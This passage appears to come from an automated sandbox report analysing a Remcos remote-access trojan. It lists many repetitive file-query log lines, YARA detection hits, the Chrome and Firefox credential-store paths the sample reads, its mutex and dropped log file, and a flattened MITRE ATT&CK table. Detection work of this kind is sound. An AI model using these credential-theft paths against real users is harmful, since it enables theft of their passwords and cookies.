                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404915 GetLocalTime,CreateEventA,CreateThread,18_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041A7A2 GetComputerNameExW,GetUserNameW,18_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,18_2_0044800F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data18_2_0040B21B
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\18_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db18_2_0040B335

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3Jump to behavior
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe18_2_00405042

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts1
                    Native API                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		2
                    Obfuscated Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Email Collection                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts13
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    Software Packing                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares211
                    Input Capture                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		1
                    DLL Side-Loading                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts4
                    PowerShell                    		Network Logon Script222
                    Process Injection                    		1
                    Bypass User Account Control                    		LSA Secrets34
                    System Information Discovery                    		SSHKeylogging213
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials21
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync21
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc Filesystem3
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
